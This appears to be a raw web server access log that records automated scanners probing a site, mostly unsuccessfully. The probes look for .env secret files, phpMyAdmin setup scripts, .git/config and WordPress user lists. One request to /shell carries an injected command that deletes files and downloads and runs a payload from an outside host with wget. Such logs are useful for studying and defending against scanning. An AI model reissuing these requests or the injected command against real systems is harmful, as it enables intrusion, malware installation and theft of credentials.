185.32.164.145 - - [02/Mar/2023:19:23:10 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:19:23:23 +0100] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:19:23:24 +0100] "POST /base HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:23:28 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:23:28 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:23:38 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:23:39 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.157.23.94 - - [02/Mar/2023:19:23:51 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [02/Mar/2023:19:23:52 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [02/Mar/2023:19:24:04 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [02/Mar/2023:19:24:04 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:24:17 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:24:17 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [02/Mar/2023:19:24:43 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [02/Mar/2023:19:24:43 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.32.164.145 - - [02/Mar/2023:19:26:03 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [02/Mar/2023:19:26:04 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:26:44 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [02/Mar/2023:19:26:44 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:19:30:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:19:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.206.114.165 - - [02/Mar/2023:19:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "HELP" 501 319 "-" "-"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /s/1383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
hashtags.scan.leakix.org - - [02/Mar/2023:19:33:40 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:40 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:41 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
161.35.27.144 - - [02/Mar/2023:19:33:41 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Mar/2023:19:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.131.196 - - [02/Mar/2023:19:34:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
172.104.218.202 - - [02/Mar/2023:19:34:13 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [02/Mar/2023:19:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:36:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
67.183.136.106 - - [02/Mar/2023:19:37:03 +0100] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:37:03 +0100] "POST /src HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [02/Mar/2023:19:37:12 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [02/Mar/2023:19:37:12 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
15.204.52.61 - - [02/Mar/2023:19:38:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
93.160.62.190 - - [02/Mar/2023:19:38:29 +0100] "GET /site/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
93.160.62.190 - - [02/Mar/2023:19:38:30 +0100] "POST /site HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.213 - - [02/Mar/2023:19:38:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
69.194.182.218 - - [02/Mar/2023:19:39:09 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:19:39:10 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:53 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:54 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:54 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:54 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:54 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:40:55 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
170.253.13.248 - - [02/Mar/2023:19:41:28 +0100] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
170.253.13.248 - - [02/Mar/2023:19:41:29 +0100] "POST /base HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:41:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:06 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:07 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:07 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:07 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:07 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:08 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:08 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:08 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:08 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:08 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:09 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:09 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:42:09 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:19:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.156 - - [02/Mar/2023:19:43:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [02/Mar/2023:19:43:37 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:45:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:45:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.194.254.30 - - [02/Mar/2023:19:49:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
212.91.246.72 - - [02/Mar/2023:19:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:51:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.154.169 - - [02/Mar/2023:19:52:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
106.75.154.169 - - [02/Mar/2023:19:52:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.16.142.230 - - [02/Mar/2023:19:53:11 +0100] "GET /sites/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [02/Mar/2023:19:53:12 +0100] "POST /sites HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:53:13 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:53:14 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:53:19 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:53:20 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
179.43.177.242 - - [02/Mar/2023:19:53:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.157.23.94 - - [02/Mar/2023:19:54:01 +0100] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [02/Mar/2023:19:54:01 +0100] "POST /vendor HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:08 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:09 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:09 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:09 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:09 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:10 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:10 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:10 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:10 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:11 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:11 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:19:54:11 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:19:54:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.119.51.126 - - [02/Mar/2023:19:54:59 +0100] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.119.51.126 - - [02/Mar/2023:19:54:59 +0100] "POST /admin HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:55:01 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [02/Mar/2023:19:55:02 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
